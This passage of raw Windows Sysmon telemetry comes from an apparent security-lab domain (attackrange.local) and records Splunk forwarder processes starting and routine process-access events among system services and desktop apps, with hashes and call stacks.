Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362398Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.008{8e433fbf-370c-6013-be03-000000001100}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033002Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:32.116{FF16AF91-370B-6013-8303-00000000A401}27683496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000362433Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.727{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362432Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.633{8e433fbf-370d-6013-c003-000000001100}904410000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362431Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.477{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-370d-6013-c003-000000001100}9044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362430Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.477{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362429Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.477{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362428Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.477{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362427Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.477{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362426Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.477{8e433fbf-2a44-6013-0600-000000001100}756876C:\Windows\system32\csrss.exe{8e433fbf-370d-6013-c003-000000001100}9044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362425Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.477{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-370d-6013-c003-000000001100}9044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362424Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.477{8e433fbf-370d-6013-c003-000000001100}9044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362423Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.164{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-339f-6013-c402-000000001100}3448C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362422Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.164{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362421Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.164{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362420Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.164{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-337e-6013-9502-000000001100}7612C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362419Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.164{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-337c-6013-8e02-000000001100}1960C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362418Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.164{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-3380-6013-9a02-000000001100}7332C:\Windows\System32\MicrosoftEdgeCP.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362417Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.164{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-337d-6013-9102-000000001100}7292C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362416Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.164{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-339a-6013-c202-000000001100}10132C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362415Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:33.164{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-3381-6013-9d02-000000001100}8712C:\Windows\SystemApps\InputApp_cw5n1h2txyewy\WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\SYSTEM32\ntdll.dll+307a9|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362442Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.512{8e433fbf-3714-6013-c103-000000001100}99205192C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362441Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.340{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3714-6013-c103-000000001100}9920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362440Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.324{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362439Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.324{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362438Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.324{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362437Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.324{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362436Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.324{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-3714-6013-c103-000000001100}9920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362435Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.324{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3714-6013-c103-000000001100}9920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362434Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:40.185{8e433fbf-3714-6013-c103-000000001100}9920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362450Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:41.153{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3714-6013-c203-000000001100}9636C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362449Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 